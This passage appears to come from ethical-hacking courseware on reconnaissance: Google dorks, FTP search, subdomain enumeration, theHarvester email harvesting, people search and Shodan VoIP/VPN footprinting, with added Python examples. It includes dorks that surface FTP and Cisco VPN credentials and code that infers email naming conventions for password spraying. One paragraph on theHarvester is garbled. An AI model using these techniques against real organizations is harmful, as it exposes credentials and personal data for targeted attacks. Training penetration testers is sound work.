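    elif term.operator in ("filetype", "ext"):
        hit = page.filetype == v.lstrip(".")
    else:  # no operator: the term may sit in title, text or URL
        hit = any(v in s.lower() for s in (page.title, page.text, page.url))
    return hit != term.negated


def query_matches(query: str, page: Page) -> bool:
    return all(any(term_matches(t, page) for t in group)
               for group in parse_query(query))


def audit(pages: List[Page], queries: List[str]) -> Dict[str, List[str]]:
    """Map each dork to the URLs of own-site pages it would surface."""
    return {q: [p.url for p in pages if query_matches(q, p)] for q in queries}


# Constructed inventory standing in for a crawl of the organization's sites
INVENTORY = [
    Page("https://intranet.example.com/hr/index.html", "Intranet - Human Resources",
         "Welcome to the human resources intranet portal."),
    Page("https://www.example.com/products.html", "Products", "Our product catalogue."),
    Page("https://vpn.example.com/config/", "Index of /config",
         "Parent Directory  vpn-client.pcf  enc_GroupPwd=..."),
    Page("https://files.example.com/remote.pcf", "remote.pcf", "[main] GroupPwd=... cisco"),
]
# The intranet query from the text plus rows of the VPN table above
QUERIES = [
    'intitle:intranet inurl:intranet +intext:"human resources"',
    '"Config" intitle:"Index of" intext:vpn',
    'filetype:pcf "cisco" "GroupPwd"',
    'filetype:pcf vpn OR Group',
    'site:www.example.com intitle:intranet',
]
```

Calling `audit(INVENTORY, QUERIES)` returns, per dork, the own-site URLs a search engine could surface; an empty list means no inventoried page is exposed to that query.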
Other Techniques for Footprinting through Search Engines
Gathering Information Using Google Advanced Search, Advanced Image Search, and Reverse Image Search
An attacker cannot always gather information easily from an information-rich site using only a normal search box. A complicated search involves a number of interrelated conditions.
Google's Advanced search feature helps an attacker to perform complex web searching. With Google Advanced Search and Advanced Image Search, one can search the web more precisely and accurately. You can use these search features to achieve the same precision as that achieved using the advanced operators but without typing or remembering the operators. Using Google's Advanced Search option, you can find sites that may link back to the target organization's website. This helps to extract information such as partners, vendors, clients, and other affiliations of the target website. You can use Google Advanced Image Search to acquire images of the target, its location, employees, and so on.
To perform an advanced search in Google, click Settings at the bottom-right of the Google home page, and then choose Advanced search in the menu or directly type https://www.google.com/advanced_search in the address bar. Advanced search allows you to specify any number of criteria that the search must match, as this pattern builds on the search box pattern by adding more search options. To do this, you choose a field. Then, enter the string you want to search for in the field's text box and click on the Advanced Search button. By default, various values are joined together with "and" (meaning all of them need to match) except for sets, blocks, and formats, which are joined together with "or" (meaning any of them can match).
Figure 2.3: Google Advance Search
To perform an advanced image search in Google, type https://www.google.com/advanced_image_search in the address bar. Advanced image search allows you to tweak your image search in a number of ways. You can search based on image color, domain, file type, size, keyword, and so on. To do this, you choose a field. Then, enter the string you want to search for in the field's text box and click on the Advanced Search button.
Figure 2.4: Google Advance Image Search
To perform a reverse image search in Google, type https://www.google.com/imghp in the address bar. Reverse image search allows you to use an image as a search query. You can upload an image or paste the URL of the image in the reverse image search engine. The search engine verifies all online images in the search engine index and displays the results.
Figure 2.5: Reverse Image Search using Google
Gathering Information from Video Search Engines
Video search engines are Internet-based search engines that crawl the web for video content. These video search engines either provide the functionality of uploading and hosting video content on their own web servers or parse video content that is hosted externally. The video content obtained from video search engines is of high value, as it can be used for gathering information about the target. Video search engines such as YouTube, Google videos, Yahoo videos, and Bing videos allow attackers to search for video content based on the format type and duration.
Figure 2.6: Screenshot of YouTube search showing results for Microsoft
After searching for videos related to the target using video search engines, an attacker can further analyze the video content to gather hidden information such as the time/date and thumbnail of the video. Using video analysis tools such as YouTube DataViewer, EZGif, and VideoReverser.com, an attacker can reverse a video or convert a video into text and other formats to extract critical information about the target.
Figure 2.7: Screenshot of YouTube DataViewer showing video analysis result
Gathering Information from Meta Search Engines
Meta search engines are a different type of search engine that use other search engines (Google, Bing, Ask.com, etc.) to produce their own results from the Internet in a very short time span. These search engines do not have their own search indexes; instead, they take the inputs from the users and simultaneously send out the queries to the third-party search engines to obtain the results. Once sufficient results are gathered, they are ranked according to their relevance and presented to the user through the web interface. Meta search engines also include a functionality whereby identical search results are filtered out so that if the user searches the same query again, it will not display the same results twice. A meta search engine is advantageous compared to simple search engines, as it can retrieve more results with the same amount of effort.
Using meta search engines, such as Startpage, MetaGer, and eTools.ch, attackers can send multiple search queries to several search engines simultaneously and gather substantially detailed information such as information from shopping sites (Amazon, eBay, etc.), images, videos, news, articles, and blogs from different sources. Further, meta search engines also provide privacy to the search engine user by hiding the user's IP address.
Figure 2.8: Screenshot of Meta Search Engine StartPage.com showing search results for Twitter
Gathering Information from FTP Search Engines
FTP search engines are used to search for files located on FTP servers that contain valuable information about the target organization. Many industries, institutions, companies, and universities use FTP servers to store large archives and other software that are shared among their employees. A special file client such as FileZilla (https://filezilla-project.org) can be used to access the FTP accounts; it also supports functionalities such as uploading, downloading, and renaming files. Although FTP servers are usually protected with passwords, many servers are left unsecured and can be accessed through web browsers directly.
Using FTP search engines such as NAPALM FTP Indexer, Global FTP Search Engine, and FreewareWeb FTP File Search, attackers can search for critical files and directories containing valuable information such as business strategies, tax documents, employee's personal records, financial records, licensed software, and other confidential information.
Listed below are some of the important advanced Google search queries to find FTP servers:
Google Dork | Description
intext:.ftpconfig inurl:github.com issues | Returns SFTP/FTP server credentials on Github
inurl:ftp ext:pdf|ps | Returns sensitive directories on FTP servers
Google search queries to find FTP servers
Attackers can use the NAPALM FTP Indexer online tool to search for critical files and documents related to the target domain.
Figure 2.9: Screenshot of FTP Search Engine NAPALM FTP Indexer showing search results for Microsoft
Figure 2.10: Screenshot of Shodan showing search results for SCADA
Figure 2.11: Screenshot of Shodan showing open ports and services of SCADA system
Footprinting through Web Services
Web services such as people search services can provide sensitive information about the target. Internet archives may also provide sensitive information that has been removed from the World Wide Web (WWW). Social networking sites, people search services, alerting services, financial services, and job sites provide information about a target such as infrastructure details, physical location, and employee details. Moreover, groups, forums, and blogs can help attackers in gathering sensitive information about a target, such as public network information, system information, and personal information. Using this information, an attacker may build a hacking strategy to break into the target organization's network and carry out other types of advanced system attacks.
Finding a Company's Top-Level Domains (TLDs) and Sub-domains
A company's top-level domains (TLDs) and sub-domains can provide a large amount of useful information to an attacker. A public website is designed to show the presence of an organization on the Internet. It is available for free public access. It is designed to attract customers and partners. It may contain information such as organizational history, services and products, and contact information. The target organization's external URL can be located with the help of search engines such as Google and Bing.
Figure 2.12: Google search engine showing results for given syntax
The sub-domain is available to only a few people. These persons may be employees of an organization or members of a department. In many organizations, website administrators create sub-domains to test new technologies before deploying them on the main website. Generally, these sub-domains are in the testing stage and are insecure; hence, they are more vulnerable to various exploitations. Sub-domains provide insights into the different departments and business units in an organization. Identifying such sub-domains may reveal critical information regarding the target, such as the source code of the website and documents on the webserver. Access restrictions can be applied based on the IP address, domain or subnet, username, and password. The sub-domain helps to access the private functions of an organization. Most organizations use common formats for sub-domains. Therefore, a hacker who knows the external URL of a company can often discover the sub-domain through trial and error, or by using a service such as Netcraft.
Tools to Search Company's Sub-domains
Netcraft
Source: https://www.netcraft.com
Netcraft provides Internet security services, including anti-fraud and anti-phishing services, application testing, and PCI scanning. They also analyze the market share of web servers, operating systems, hosting providers, and SSL certificate authorities, and other parameters of the Internet. As shown in the screenshot below, attackers can use Netcraft to obtain all the sub-domains related to the target domain.
Figure 2.14: Screenshot of Netcraft displaying subdomains of microsoft.com
Sublist3r
Source: https://github.com
Sublist3r is a Python script designed to enumerate the subdomains of websites using OSINT. It helps penetration testers and bug hunters in collecting and gathering subdomains for the domain they are targeting. It enables you to enumerate subdomains across multiple sources at once. Further, it enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu, and Ask. It also enumerates subdomains using Netcraft, VirusTotal, ThreatCrowd, DNSdumpster, and ReverseDNS.
Syntax: sublist3r [-d DOMAIN] [-b BRUTEFORCE] [-p PORTS] [-v VERBOSE] [-t THREADS] [-e ENGINES] [-o OUTPUT]
Short Form | Long Form | Description
-d | --domain | Domain name to enumerate subdomains of
-b | --bruteforce | Enable the subbrute bruteforce module
-p | --ports | Scan the found subdomains against specific TCP ports
-v | --verbose | Enable the verbose mode and display results in real time
-t | --threads | Number of threads to use for subbrute bruteforce
-e | --engines | Specify a comma-separated list of search engines
-h | --help | Show the help message and exit
Table 2.4: Sublist3r options with description
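Sub-domain enumeration output like Sublist3r's is also useful to the defender: reconciled against the approved asset inventory, it reveals the forgotten test and dev sub-domains the text describes as typically insecure. The Python below is an added example, not Sublist3r or EC-Council code; it assumes one hostname per line (as in the constructed sample) and a constructed example.com inventory.

```python
"""Reconcile an externally enumerated subdomain list (assumed one hostname per
line, as in the constructed sample) against the approved asset inventory.
Added example, not Sublist3r or EC-Council code."""
import re
from typing import Dict, Iterable, List

HOSTNAME = re.compile(
    r"^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*$")
# Labels marking the test/dev sub-domains the text describes as usually insecure
TEST_LABEL = re.compile(r"^(dev|test|staging|uat|qa|beta|sandbox|old)(\d+|[-_].*)?$")


def normalise(entry: str) -> str:
    """Lower-case a host, dropping scheme, path, port and trailing dot."""
    host = entry.strip().lower()
    host = re.sub(r"^[a-z]+://", "", host).split("/")[0].split(":")[0]
    return host.rstrip(".")


def parse_enumeration(output: str, domain: str) -> List[str]:
    """Keep valid hostnames under `domain`, deduplicated, in first-seen order.
    Banner lines and out-of-scope names are discarded."""
    domain = domain.lower()
    kept: Dict[str, None] = {}
    for line in output.splitlines():
        host = normalise(line)
        if not HOSTNAME.match(host):
            continue
        if host != domain and not host.endswith("." + domain):
            continue
        kept.setdefault(host, None)
    return list(kept)


def labels_below(host: str, domain: str) -> List[str]:
    """Sub-domain labels of `host` under `domain`, e.g. ['api', 'staging']."""
    if host == domain:
        return []
    return host[: -(len(domain) + 1)].split(".")


def reconcile(enumerated: Iterable[str], approved: Iterable[str],
              domain: str) -> Dict[str, List[str]]:
    """Return hosts unknown to the inventory and hosts with test/dev-style labels."""
    approved_set = {normalise(a) for a in approved}
    enumerated = list(enumerated)
    unknown = [h for h in enumerated if h not in approved_set]
    test_like = [h for h in enumerated
                 if any(TEST_LABEL.match(lbl) for lbl in labels_below(h, domain))]
    test_set = set(test_like)
    return {
        "unknown": unknown,
        "test_like": test_like,
        # Highest priority: exposed, unmanaged and apparently non-production
        "unknown_and_test_like": [h for h in unknown if h in test_set],
    }


# Constructed sample: a banner line, mixed case, a trailing dot, a URL, an
# out-of-scope host, and several test-style names
SAMPLE_OUTPUT = """\
[-] Enumerating subdomains now for example.com
www.example.com
mail.example.com
dev.example.com
staging-api.example.com
test2.example.com
WWW.EXAMPLE.COM.
https://vpn.example.com/
not-ours.example.org
"""
APPROVED = ["www.example.com", "mail.example.com", "vpn.example.com"]

if __name__ == "__main__":
    hosts = parse_enumeration(SAMPLE_OUTPUT, "example.com")
    for bucket, names in reconcile(hosts, APPROVED, "example.com").items():
        print(f"{bucket}: {', '.join(names) or '-'}")
```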
Example 1:
As shown in the screenshot, Sublist3r helps attackers in enumerating the subdomains of a target company from multiple sources at the same time.
Figure 2.15: Screenshot of Sublist3r displaying sub-domains of google.com
Example 2:
Sublist3r also helps attackers in enumerating the subdomains of a target company with a specific port open.
Figure 2.16: Screenshot of Sublist3r displaying sub-domains of google.com with port 80 open
Pentest-Tools FindSubdomains
Source: https://pentest-tools.com
Pentest-Tools FindSubdomains is an online tool used for discovering subdomains and their IP addresses, including network information and their HTTP servers. As shown in the screenshot, attackers search for sub-domains related to microsoft.com to obtain critical information about the target company domain, such as sub-domains, IP addresses, operating systems, servers used, web technology platform used, and page titles.
Figure 2.17: Screenshot of Pentest-Tools displaying sub-domains of microsoft.com
Finding the Geographical Location of the Target
Information such as the physical location of an organization plays a vital role in the hacking process. Attackers can obtain this information using footprinting. In addition to the physical location, a hacker can also acquire information such as surrounding public Wi-Fi hotspots that may offer a way to break into the target organization's network. Attackers with the knowledge of a target organization's location may attempt dumpster diving, surveillance, social engineering, and other non-technical attacks to gather more information. Once the attackers discern the location of the target, they can obtain detailed satellite images of the location using various sources available on the Internet such as Google Earth and Google Maps. The attackers can use this information to gain unauthorized access to buildings, wired and wireless networks, and systems.
Tools for Finding the Geographical Location
The tools for finding the geographical location allow you to find and explore most locations on the earth. They provide information such as images of buildings, as well as their surroundings, including Wi-Fi networks. Tools such as Google Maps even locate entrances of the building, security cameras, and gates. These tools provide interactive maps, outline maps, satellite imagery, and information on how to interact with and create one's own maps. Google Maps, Yahoo Maps, and other tools provide driving directions, traffic conditions, landmarks, and detailed address and contact information.
Attackers may use tools such as Google Earth, Google Maps, and Wikimapia to find or locate entrances to buildings, security cameras, gates, places to hide, weak spots in perimeter fences, and utility resources such as electricity connections, to measure the distance between different objects, and so on.
+ Google Earth (https://earth.google.com)
Attackers use the Google Earth tool to find the exact location of a target. Using this tool, attackers can even access 3D images that depict most of the Earth's populated surface with a high resolution. The detail allows attackers to obtain street views, altitude information, and even coordinates.
Figure 2.18: Screenshot of Google Earth
People Search on Social Networking Sites and People Search Services
People Search on Social Networking Sites
Searching for a particular person on a social networking website is fairly easy. Social networking services are online services, platforms, or sites that focus on facilitating the building of social networks or social relations among people. These websites contain information that users provide in their profiles. They help to directly or indirectly relate people to each other through various fields such as common interests, work location, and education.
Social networking sites allow people to share information quickly, as they can update their personal details in real time. Such sites allow users to update facts about upcoming or current events, recent announcements and invitations, and so on. Social networking sites are a great platform for finding people and their related information. Many social networking sites allow visitors to search for people without registering on the site; this makes people searching on social networking sites an easy and anonymous task. A user can search for a person using the name, email, or address. Some sites allow users to check whether an account is active, which then provides information on the status of the person being searched.
Social networking sites such as Facebook, Twitter, LinkedIn, and Instagram allow you to find people by name, keyword, company, school, friends, colleagues, and the people living around them. Searching for people on these sites returns personal information such as name, position, organization name, current location, and educational qualifications. In addition, you can also find professional information such as company or business, current location, phone number, email ID, photos, videos, and so on. Social networking sites such as Twitter are used to share advice, news, concerns, opinions, rumors, and facts. Through people searching on social networking services, an attacker can gather critical information that will help them in performing social engineering or other kinds of attacks.
Figure 2.19: Screenshot showing Facebook search results
People Search on People Search Services
You can use public record websites to find information about email addresses, phone numbers, house addresses, and other information. Many individuals use online people search services to find information about other people. Generally, online people search services such as pipl, Intelius, BeenVerified, Whitepages, and PeekYou provide people's names, addresses, contact details, date of birth, photographs, videos, profession, details about their family and friends, social networking profiles, property information, and optional criminal background checks. Further, online people search services may often reveal the profession of an individual, businesses owned by a person, upcoming projects and operating environment, websites and blogs, contact numbers, important dates, company email addresses, cell phone numbers, fax numbers, and personal e-mail addresses. Using this information, an attacker can try to obtain bank details, credit card details, past history, and so on. This information proves to be highly beneficial for attackers to launch attacks. There are many people search services available online that help in obtaining information regarding people. Examples of such people search services include pipl, Intelius, and AnyWho.
+ People search service Intelius
Source: https://www.intelius.com
Attackers can use the Intelius people search online service to search for people belonging to the target organization. Using this service, attackers obtain information such as phone numbers, address history, age, date of birth, relatives, previous work history, educational background, and so on.
Figure 2.20: Screenshot of Intelius People Search
Gathering Information from LinkedIn
LinkedIn is a social networking website for professionals. It connects the world's human resources to aid productivity and success. The site contains personal information such as name, position, organization name, current location, educational qualifications, and so on. Information gathered from LinkedIn helps an attacker in performing social engineering or other kinds of attacks.
Attackers can use the theHarvester tool to gather information from LinkedIn based on the target organization name:
theHarvester
Source:http://www.edge-security.com
theHarvesteris a tool designed
usedforopen-source
threat landscape
intelligence
to be usedi n the early
gathering
andhelps of
stagesa penetration
to determinea company's
on the Internet. Attackersuse thistool to perform
test. It is
external
enumeration on the
Linkedinsocialnetworking site to findemployees ofthetargetcompanyalong withtheir
jobtitles.
As shown in the screenshot, the attacker runs theHarvester against the target organization's domain with LinkedIn selected as the data source to enumerate users on LinkedIn.
Screenshot: attackers search on LinkedIn using theHarvester (theHarvester search results from LinkedIn)
Harvesting Email Lists
Gathering email addresses related to the target organization acts as an important attack vector during the later phases of hacking. Attackers can use automated tools such as theHarvester and Email Spider to collect publicly available email addresses of the employees of the target organization. These tools harvest email lists related to a specified domain using search engines such as Google, Bing, and Baidu. Attackers use these email lists and usernames to perform social engineering and brute force attacks on the target organization.
theHarvester
Source: http://www.edge-security.com
Attackers use the theHarvester tool to extract email addresses related to the target domain. For example, attackers use the following command to extract email addresses of microsoft.com using the Baidu search engine:
    theharvester -d microsoft.com -l 200 -b baidu
In the above command, -d specifies the domain used for harvesting the emails, -l limits the results to 200, and -b tells theHarvester to extract the results from the Baidu search engine; alternatively, you can use Google, Bing, etc.
Figure 2.23: Screenshot showing theHarvester command to extract email addresses
Figure 2.24: Screenshot showing emails extracted by theHarvester
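The following Python example is added here as an illustration and is not part of the original courseware or of theHarvester's own code. It shows the core of what an email harvester does with search-engine output: de-obfuscate addresses written as "user [at] domain [dot] com", extract addresses with a regular expression, keep only those on the target domain and its subdomains (rejecting look-alikes such as notexample.com), apply a result limit like theHarvester's -l option, and then infer the organization's address naming convention so that further addresses can be guessed for the social-engineering and brute-force attacks described above. The snippets, domain and names are constructed sample data.

```python
import re
from collections import Counter

# Constructed search-engine result snippets (sample data, not real search output).
SAMPLE_SNIPPETS = [
    "Press enquiries: press.office@example.com or media@news.example.com",
    "John Doe - Security Engineer - jdoe [at] example [dot] com",
    "Email: Alice.Smith@Example.COM. Phone: +1 555 0100",
    "Partner contact: bob@example.org (a different domain, must be ignored)",
    "Reach carol.jones@example.com or spoof@notexample.com",
    "Duplicate mention of alice.smith@example.com in a cached page",
]

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
OBFUSCATED_AT = re.compile(r"\s*[\[(]\s*at\s*[\])]\s*", re.I)
OBFUSCATED_DOT = re.compile(r"\s*[\[(]\s*dot\s*[\])]\s*", re.I)


def deobfuscate(text):
    """Turn 'user [at] host [dot] tld' style spellings back into plain addresses."""
    return OBFUSCATED_DOT.sub(".", OBFUSCATED_AT.sub("@", text))


def harvest_emails(snippets, domain, limit=None):
    """Return sorted unique addresses on `domain` or one of its subdomains.

    `limit` plays the role of theHarvester's -l option: stop once that many
    distinct addresses have been collected.
    """
    domain = domain.lower()
    found = set()
    for text in snippets:
        for addr in EMAIL_RE.findall(deobfuscate(text)):
            addr = addr.lower()
            host = addr.rpartition("@")[2]
            # Exact domain or a subdomain of it; 'notexample.com' must not pass.
            if host == domain or host.endswith("." + domain):
                found.add(addr)
                if limit is not None and len(found) >= limit:
                    return sorted(found)
    return sorted(found)


def infer_naming_convention(emails):
    """Guess how the organization forms the local part of its addresses."""
    counts = Counter()
    for addr in emails:
        local = addr.split("@", 1)[0]
        if "." in local:
            counts["first.last"] += 1
        elif "_" in local:
            counts["first_last"] += 1
        elif "-" in local:
            counts["first-last"] += 1
        else:
            counts["single-token"] += 1  # e.g. jdoe, media
    return counts.most_common(1)[0][0] if counts else "unknown"


def candidate_address(first, last, convention, domain):
    """Build a likely address for a known employee name under the inferred convention."""
    first, last = first.lower(), last.lower()
    locals_by_convention = {
        "first.last": f"{first}.{last}",
        "first_last": f"{first}_{last}",
        "first-last": f"{first}-{last}",
    }
    local = locals_by_convention.get(convention, first[0] + last)  # fallback: flast
    return f"{local}@{domain}"


if __name__ == "__main__":
    emails = harvest_emails(SAMPLE_SNIPPETS, "example.com", limit=200)
    convention = infer_naming_convention(emails)
    print(emails, convention, candidate_address("Dana", "Lee", convention, "example.com"))
```

The subdomain check matters in practice: a naive `domain in host` test would accept spoof@notexample.com and pollute the list used for later password spraying.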
Gathering Information from Financial Services
Attackers who seek access to personal information or financial information often target financial data such as stock quotes and charts, news, and portfolios. Financial services such as Google Finance, MSN Money, Yahoo Finance, and Investing.com can provide a large amount of useful information such as the market value of a company's shares, company profile, competitor details, stock exchange rates, corporate press releases, and financial reports along with news and blog search articles about corporations. The information provided varies from one service to the other. Financial firms rely on web services to perform transactions and grant users access to their accounts. Attackers can obtain sensitive and private information regarding these firms by using malware, exploiting software design flaws, breaking authentication mechanisms, service flooding, and performing brute force attacks and phishing attacks.
Google Finance
Source: https://www.google.com/finance
The Google Finance service features business and enterprise headlines for many corporations, including their financial decisions and major news events. Stock information is also available, as are stock price charts that contain marks for major news events and corporate actions. The site also aggregates Google News and Google Blog Search articles about each corporation.
Figure 2.25: Screenshot of Google Finance Service
Footprinting through Job Sites
Attackers can gather valuable information about the company's infrastructure details, operating system, software versions, and database schema of an organization through footprinting job sites using different techniques. Many organizations' websites provide recruiting information on a job posting page that, in turn, reveals hardware and software information, network-related information, and technologies used by the company (e.g., firewall, internal server type, OS used, network appliances, and so on). In addition, the organization website may have a key employee list with email addresses. Such information may prove to be beneficial for an attacker. For example, if an organization advertises a Network Administrator job, it posts the requirements related to that position. Further, attackers can go through employee resumes posted on job sites and extract information such as an individual's expertise, educational qualifications, and job history. The job history of an employee can reveal technical information about the target organization. Attackers can use the technical information obtained through job sites such as Dice, LinkedIn, and Simply Hired to detect underlying vulnerabilities in the target IT infrastructure.
Figure 2.26: Screenshot of job posting showing valuable information
Deep and Dark Web Footprinting
The surface web is the outer layer of the online cyberspace that allows the user to find web pages and content using regular search engines and web browsers. Search engines use crawlers, bots that are programmed to access and download web pages. The surface web can be accessed by browsers such as Google Chrome, Mozilla Firefox, and Opera.
The deep web is the layer of the online cyberspace that consists of web pages and content that are hidden and unindexed. Such content cannot be located using traditional search engines. The size of the deep web is incalculable, and it is estimated to make up the bulk of the World Wide Web. The deep web does not allow the crawling process of basic search engines. It consists of official government or federal databases and other information linked to various organizations. The deep web can be accessed using tools such as Tor Browser and the WWW Virtual Library. It can be used for both legal and illegal activities.
The dark web or Darknet is a deeper layer of the online cyberspace, and it is the subset of the deep web that enables anyone to navigate anonymously without being traced. The dark web can be accessed only through specialized tools or darknet browsers. Attackers primarily use the dark web to perform footprinting on the target organization and launch attacks. The dark web can be accessed using tools such as Tor Browser; ExoneraTor (a Tor Project service that reports whether a given IP address was a Tor relay on a given date, rather than a search engine) is useful alongside it.
Attackers can use deep and dark web searching tools such as Tor Browser, ExoneraTor, and the OnionLand Search engine to gather confidential information about the target, such as credit card details, passport information, identification card details, medical records, social media accounts, and Social Security Numbers (SSNs). With the help of this information, they can launch further attacks on the targets.
Tor Browser
Source: https://www.torproject.org
Tor Browser is used to access the deep and dark web. It routes the user's traffic through several Tor relays before it reaches the destination, so the site visited sees the IP address of the exit relay rather than the user's network IP address. Note that Tor is not a VPN: traffic between the exit relay and a non-onion site is not encrypted by Tor, so plaintext protocols remain readable at that hop. Attackers use this browser to access hidden content, unindexed websites, and encrypted databases present in the deep web.
As shown in the screenshot, by using Tor Browser, attackers can obtain more detailed and hidden information about the target organization.
Figure 2.27: Screenshot of Tor Browser
Determining the Operating System
Attackers use various online tools such as Netcraft, Shodan, and Censys to detect the operating system used at the target organization. These tools search the Internet for detecting connected devices such as servers, routers, and IoT devices belonging to the target organization. Using these tools, attackers obtain information such as the city, country, latitude/longitude, hostname, operating system, and IP address of the target organization. Such information further helps attackers in identifying potential vulnerabilities and finding effective exploits to perform various attacks on the target.
Netcraft
Source: https://www.netcraft.com
The technique of obtaining information about the target network operating system is called OS fingerprinting. Open https://www.netcraft.com in the browser and type the domain name of the target network in the "What's that site running?" field. Attackers use the Netcraft tool to identify all the sites associated with the target domain along with the operating system running at each site.
Figure 2.28: Screenshot of Netcraft showing target operating system
SHODAN Search Engine
Source: https://www.shodan.io
Shodan is a computer search engine that searches the Internet for connected devices (routers, servers, IoT, etc.). You can use Shodan to discover which devices are connected to the Internet, where they are located, and who is using them.
It helps attackers to keep track of all the devices on the target network that are directly accessible from the Internet. It also allows the attacker to find devices based on the city, country, latitude/longitude, hostname, operating system, and IP address. Further, it helps the attacker to search for known vulnerabilities and exploits across Exploit DB, Metasploit, CVE, OSVDB (discontinued in 2016), and Packetstorm with a single interface.
Figure 2.29: Screenshot of SHODAN search engine
Censys
Source: https://censys.io
Censys monitors the infrastructure and discovers unknown assets anywhere on the Internet. It provides a full view of every server and device exposed to the Internet. Attackers use this tool to monitor the target IT infrastructure to discover various devices connected to the Internet along with their details such as the operating system used, IP address, protocols used, and geographical location.
Figure 2.30: Screenshot of Censys Search Engine showing target operating system
VoIP and VPN Footprinting through SHODAN
Source: https://www.shodan.io
Shodan is a search engine that enables attackers to perform footprinting at various levels. It is used to detect devices and networks with vulnerabilities. A search in Shodan for VoIP and VPN footprinting can deliver various results, which will help gather VPN- and VoIP-related information. The following screenshots show some of the VPN and VoIP footprinting search results obtained through Shodan.
Figure 2.31: Screenshot of SHODAN search engine showing VoIP results
Figure 2.32: Screenshot of SHODAN search engine showing VPN results
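The following Python example is added here to illustrate both the operating-system determination discussed under Shodan above and the VoIP/VPN footprinting in this section; it is not part of the original courseware or of Shodan's own client. It works on constructed records shaped like Shodan banners (ip_str, port, transport, product, os, org, hostnames, location, data), filters them to the target organization, buckets each exposed service as VoIP (SIP on 5060/5061), VPN (IKE/ISAKMP on 500/4500, OpenVPN on 1194, PPTP on 1723) or other, and fills in the operating system from the banner text when the `os` field is empty. The helper that builds the equivalent Shodan query uses the `org:` and `port:` search filters; everything else (IP addresses, organization name, banners) is made-up sample data.

```python
from collections import Counter

# Constructed banner records in the shape Shodan returns. Made-up values, not real Shodan output.
LOC = {"city": "Albuquerque", "country_name": "United States"}
SAMPLE_BANNERS = [
    {"ip_str": "203.0.113.10", "port": 5060, "transport": "udp", "product": "Asterisk", "os": None,
     "org": "Example Corp", "hostnames": ["pbx.example.com"], "location": LOC,
     "data": "SIP/2.0 200 OK\r\nServer: Asterisk PBX 16.2.1\r\n"},
    {"ip_str": "203.0.113.11", "port": 500, "transport": "udp", "product": None, "os": None,
     "org": "Example Corp", "hostnames": ["vpn.example.com"], "location": LOC,
     "data": "ISAKMP\r\nVendor ID: XAUTH\r\n"},
    {"ip_str": "203.0.113.12", "port": 1194, "transport": "udp", "product": "OpenVPN", "os": None,
     "org": "Example Corp", "hostnames": [], "location": LOC, "data": "OpenVPN"},
    {"ip_str": "203.0.113.13", "port": 443, "transport": "tcp", "product": "nginx", "os": None,
     "org": "Example Corp", "hostnames": ["www.example.com"], "location": LOC,
     "data": "HTTP/1.1 200 OK\r\nServer: nginx/1.18.0 (Ubuntu)\r\n"},
    {"ip_str": "203.0.113.14", "port": 3389, "transport": "tcp", "product": "Remote Desktop Protocol",
     "os": "Windows Server 2016", "org": "Example Corp", "hostnames": ["ts.example.com"],
     "location": LOC, "data": "\x03\x00\x00\x13\x0e\xd0"},
    {"ip_str": "198.51.100.7", "port": 5060, "transport": "udp", "product": "FreeSWITCH", "os": None,
     "org": "Other ISP", "hostnames": [], "location": LOC, "data": "SIP/2.0 404 Not Found\r\n"},
]

VOIP_PORTS = {5060, 5061}              # SIP signalling (UDP/TCP and TLS)
VPN_PORTS = {500, 4500, 1194, 1723}    # IKE/ISAKMP, IPsec NAT-T, OpenVPN, PPTP
OS_TOKENS = ("Ubuntu", "Debian", "CentOS", "Red Hat", "FreeBSD", "Windows")


def classify(banner):
    """Bucket a banner as 'voip', 'vpn' or 'other' from its port and banner text."""
    data = banner.get("data") or ""
    product = banner.get("product") or ""
    if banner["port"] in VOIP_PORTS or data.startswith("SIP/2.0"):
        return "voip"
    if banner["port"] in VPN_PORTS or "OpenVPN" in product or "ISAKMP" in data:
        return "vpn"
    return "other"


def infer_os(banner):
    """Prefer Shodan's os field; otherwise look for an OS name inside the banner text."""
    if banner.get("os"):
        return banner["os"]
    data = banner.get("data") or ""
    for token in OS_TOKENS:
        if token in data:
            return token
    return None


def filter_banners(banners, org=None, port=None):
    """Keep only banners for the given organization and/or port (like Shodan's org:/port: filters)."""
    return [b for b in banners
            if (org is None or b.get("org") == org) and (port is None or b["port"] == port)]


def footprint(banners, org):
    """Summarize what the target exposes: VoIP, VPN, other services, OS tally and hostnames."""
    summary = {"voip": [], "vpn": [], "other": [], "os": Counter(), "hosts": set()}
    for b in filter_banners(banners, org=org):
        summary[classify(b)].append(f'{b["ip_str"]}:{b["port"]}/{b["transport"]}')
        os_name = infer_os(b)
        if os_name:
            summary["os"][os_name] += 1
        summary["hosts"].update(b.get("hostnames") or [])
    return summary


def shodan_query(org, category):
    """Build the equivalent Shodan search string for a VoIP or VPN sweep of one organization."""
    ports = sorted(VOIP_PORTS if category == "voip" else VPN_PORTS)
    return f'org:"{org}" port:{",".join(map(str, ports))}'


if __name__ == "__main__":
    result = footprint(SAMPLE_BANNERS, "Example Corp")
    for key in ("voip", "vpn", "other"):
        print(key, result[key])
    print("os:", dict(result["os"]), "hosts:", sorted(result["hosts"]))
    print(shodan_query("Example Corp", "voip"))
```

Port-based bucketing is only a first pass: a SIP service answering on a non-standard port is caught by the banner check, while an HTTP service on 5060 would be misfiled, so confirm with the banner text before acting on the summary.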
Competitive Intelligence Gathering
Competitive intelligence gathering is the process of identifying, gathering, verifying, analyzing, and using information about your competitors from resources such as the Internet. Competitive intelligence means understanding and learning as much as possible about other businesses in order to become as competitive as possible. It is non-interfering and subtle in nature compared to direct intellectual property theft carried out via hacking or industrial espionage. It focuses on the external business environment. In this method, professionals gather information ethically and legally instead of gathering it secretly.
Competitive intelligence helps in determining:
- What are the competitors doing?
- How are competitors positioning their products and services?
- What are customers saying about competitors' strengths and weaknesses?
Companies carry out competitive intelligence either by employing people to search for information or by utilizing a commercial database service, which involves lower costs. The information that is gathered can help the managers and executives of a company make strategic decisions.
Sources of Competitive Intelligence
Competitive intelligence gathering can be performed using a direct or indirect approach.
Direct Approach
The direct approach serves as the primary source for competitive intelligence gathering. Direct approach techniques include gathering information from trade shows, social engineering of employees and customers, and so on.
Indirect Approach
Through an indirect approach, information about competitors is gathered using online resources. Indirect approach techniques include:
- Company websites and employment ads
- Search engines, Internet, and online databases
- Press releases and annual reports
- Trade journals, conferences, and newspapers
- Patents and trademarks
- Social media postings
- Support threads and reviews
- Product catalogs and retail outlets
- Analyst and regulatory reports
- Customer and vendor interviews
- Agents, distributors, and suppliers
